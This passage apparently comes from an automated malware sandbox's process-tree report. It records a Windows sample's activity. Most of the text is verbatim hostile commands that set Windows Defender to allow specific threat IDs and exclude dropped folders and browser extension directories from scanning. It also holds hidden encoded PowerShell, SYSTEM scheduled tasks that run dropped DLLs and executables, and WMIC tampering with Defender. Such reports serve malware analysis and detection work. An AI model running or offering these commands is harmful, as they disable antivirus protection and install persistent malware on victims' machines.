\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5712
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3644
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7388
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7584
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3404
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3444
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5060
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AqhCymdmIBUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AqhCymdmIBUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QubjZgZsgVxU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QubjZgZsgVxU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XhLCDmquyDmYC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XhLCDmquyDmYC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tSRsKJOgU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tSRsKJOgU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mjUPcNFqgWzmMMVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mjUPcNFqgWzmMMVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gGlzHXLNukBnGkUk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gGlzHXLNukBnGkUk\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:5484
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AqhCymdmIBUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5872
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AqhCymdmIBUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5584
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AqhCymdmIBUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QubjZgZsgVxU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QubjZgZsgVxU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XhLCDmquyDmYC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4572
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XhLCDmquyDmYC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tSRsKJOgU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tSRsKJOgU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mjUPcNFqgWzmMMVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mjUPcNFqgWzmMMVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gGlzHXLNukBnGkUk /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gGlzHXLNukBnGkUk /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5468
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gPVgTkXSb" /SC once /ST 00:04:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4912
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gPVgTkXSb"
  2⤵
  PID:5512
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gPVgTkXSb"
  2⤵
  PID:448
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "YNRMAHHYAWtfapctR" /SC once /ST 00:02:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gGlzHXLNukBnGkUk\JuzkbKfKfyDoQdV\TzmPNGA.exe\" p2 /ktWSdidWT 385132 /S" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5936
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "YNRMAHHYAWtfapctR"
  2⤵
  PID:4000
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 924
  2⤵
  - Program crash
  PID:6352

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
PID:7348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3500
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:7620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6944

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:856

C:\Windows\Temp\gGlzHXLNukBnGkUk\JuzkbKfKfyDoQdV\TzmPNGA.exe
C:\Windows\Temp\gGlzHXLNukBnGkUk\JuzkbKfKfyDoQdV\TzmPNGA.exe p2 /ktWSdidWT 385132 /S
1⤵
PID:4588
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bTVQzzKDZQMhkLPDbz"
  2⤵
  PID:8012
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:8120
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:6676
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:5888
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7772
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:1412
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\tSRsKJOgU\xsEVnR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wovFAmtOpAxrHrl" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1740
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "wovFAmtOpAxrHrl2" /F /xml "C:\Program Files (x86)\tSRsKJOgU\aDrcYqO.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6688
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "wovFAmtOpAxrHrl"
  2⤵
  PID:1540
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "wovFAmtOpAxrHrl"
  2⤵
  PID:5712
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "OrspJZQoDyehPl" /F /xml "C:\Program Files (x86)\QubjZgZsgVxU2\VzCBCLy.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6472
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "AfBtKiWWYHIKP2" /F /xml "C:\ProgramData\mjUPcNFqgWzmMMVB\YLgmtqI.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:7608
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "WyNLkpRDmiMxCDgFB2" /F /xml "C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR\vEFiyvJ.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2240
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "sTjfLxzHimdPzpCahty2" /F /xml "C:\Program Files (x86)\XhLCDmquyDmYC\sWlJXYh.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1964
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "CsFigRpOItwcpvTmu" /SC once /ST 00:50:56 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gGlzHXLNukBnGkUk\EhAqBAdr\RPiXiez.dll\",#1 /mYdido 385132" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2092
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "CsFigRpOItwcpvTmu"
  2⤵
  PID:5980
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "YNRMAHHYAWtfapctR"
  2⤵
  PID:3788
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 1968
  2⤵
  - Program crash
  PID:6808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7312 -ip 7312
1⤵
PID:1588

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gGlzHXLNukBnGkUk\EhAqBAdr\RPiXiez.dll",#1 /mYdido 385132
1⤵
PID:5904
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gGlzHXLNukBnGkUk\EhAqBAdr\RPiXiez.dll",#1 /mYdido 385132
  2⤵
  PID:2920
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "CsFigRpOItwcpvTmu"
    3⤵
    PID:1124

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4836
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:3284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1248 -ip 1248
1⤵
PID:7908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4588 -ip 4588
1⤵
PID:4792

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:7224
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:5020
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 24001 -prefMapSize 244989 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b16bc12e-fa2b-4dba-a618-7430f3d7b550} 5020 "\\.\pipe\gecko-crash-server-pipe.5020" gpu
    3⤵
    PID:1572
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2360 -prefMapHandle 2352 -prefsLen 24037 -prefMapSize 244989 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d778fbe1-0da5-4e2c-ab78-79c53f49b5bb} 5020 "\\.\pipe\gecko-crash-server-pipe.5020" socket
    3⤵
    PID:3540
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3632 -childID 1 -isForBrowser -prefsHandle 3468 -prefMapHandle 3772 -prefsLen 24178 -prefMapSize 244989 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3792fb36-e8ff-4274-b654-9ccf81d1816b} 5020 "\\.\pipe\gecko-crash-server-pipe.5020" tab
    3⤵
    PID:7264
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2980 -childID 2 -isForBrowser -prefsHandle 1552 -prefMapHandle 1220 -prefsLen 28471 -prefMapSize 244989 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {981d5f37-62b3-46fc-a72d-8671d1f1f632} 5020 "\\.\pipe\gecko-crash-server-pipe.5020" tab
    3⤵
    PID:7444
